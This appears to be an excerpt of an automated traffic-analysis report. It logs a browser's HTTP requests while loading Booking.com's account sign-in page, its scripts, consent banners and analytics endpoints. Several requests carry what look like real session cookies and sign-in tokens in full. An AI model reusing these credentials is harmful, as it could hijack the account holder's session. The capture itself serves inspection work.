Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/558_a83b0423500bf7bdde4f.css HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/runtime~index_c0588e72f40ac437d8ec.js HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/54_97d049b4c4a1c2f7cfdb.js HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/186_64aa868ce6516e0299e8.js HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/815_db878ca1a620671f4e39.js HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/624_c3f4693c114ce437d359.js HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/558_6804f02cc80e1e7a1183.js HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/177_db96d4a35221dc0c82ef.js HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/133_878a17a1dd9684883a3d.js HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/index_7a28a601d9853236fbbd.js HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /libs/privacy-consent/1.0.0/partner/cookie-banner.min.js HTTP/1.1Host: www.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /analytics.js?ca=accountsportal HTTP/1.1Host: saa.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d
Source: global traffic	HTTP traffic detected: GET /_/fvtrpw.gif HTTP/1.1Host: account.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://account.booking.com/sign-in?op_token=EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiODRjN2JhZDUtNzUzYi00ZjQzLWEzNGMtODE5YTM3NzkyZDNkIn0yK055NlpnUFpEQUtwZEl1V241UWxNT0UzOHUxV1MwSmlfTHNEZDFEUVp6SW86BFMyNTZCBGNvZGUqEzCupfK7z8AnOgBCAFi1zL2fyDIAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_ap=U2FsdGVkX19Qcb0ZrFozTSDj%2By74K78DVVZoCSTgPHlqGLYtYoY%2F8Hfq8hMtuKqBJvL%2FDMZuTBHY%0A8dWcwlmt3A%3D%3D%0A
Source: global traffic	HTTP traffic detected: GET /scripttemplates/otSDKStub.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /consent/a387750c-a080-4dd0-b2d1-7dbdb601bb14/a387750c-a080-4dd0-b2d1-7dbdb601bb14.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://account.booking.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://account.booking.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripttemplates/202408.1.0/otBannerSdk.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /libs/acc-clientlib/v5/clientlib.js HTTP/1.1Host: xx.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /libs/datavisor/20231228/sdk.js HTTP/1.1Host: xx.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /asset.76f4cfe389ea593cf33909bbcedb7949.js HTTP/1.1Host: saa.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30
Source: global traffic	HTTP traffic detected: GET /design-assets/assets/v3.58.1/fonts-brand/BookingExtraBold.woff HTTP/1.1Host: t-cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://account.booking.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cf.bstatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /backend_static/common/flags/new/48-squared/us.png HTTP/1.1Host: q-xx.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /consent/a387750c-a080-4dd0-b2d1-7dbdb601bb14/0191ffb2-0224-7614-89a9-ce4becc49775/en-us.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://account.booking.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d8c14d4960ca/c2181391033f/challenge.js HTTP/1.1Host: d8c14d4960ca.edge.sdk.awswaf.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d3gyis3a305juqty.js?easxdktx3iyl3dqz=doregtzf&ff3purc65lcv9xi9=b2cf23ab-75aa-400a-9277-1849f1de255f HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30
Source: global traffic	HTTP traffic detected: GET /ec/c.html?name=ecid HTTP/1.1Host: saa.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://account.booking.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ec/e.html?name=ecid HTTP/1.1Host: saa.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://account.booking.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripttemplates/202408.1.0/assets/otCommonStyles.css HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://account.booking.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d8c14d4960ca/c2181391033f/challenge.js HTTP/1.1Host: d8c14d4960ca.d2eb2267.us-east-1.token.awswaf.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dedge/zd/zd-service.html HTTP/1.1Host: ls.cdn-gw-dv.vipConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /raphael_cs HTTP/1.1Host: booking.ck123.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonContent-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://account.booking.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ping HTTP/1.1Host: booking.gw-dv.vipConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonContent-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://account.booking.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /W5k8vheaBvPcSQ-a?d697568ef142c1ee=iGp4m61vnS1MFJMhTos2gUmhdt120w_J4nyYqUoLRDZnPqsKeH0w-kUajYeF_VcvVhBTFBmv8R9h6kl986td_Bh4zVvvcXpdVW72EW_KhekZIYC4vcDolKRN0LI2IBsvGQ29lKMi48MO-KdAGB6JHUmjS-mzxbj5cuWNagPVc7dE8KzkynZozoYQiqkKaykrnFrfJAgDZ3RbtURd&jb=373b242468716f773555696e64677773266a7b673f556b666467777b2732303132266a7160773f416a706f6f6d246a7362354368726f656d27303239313f HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe
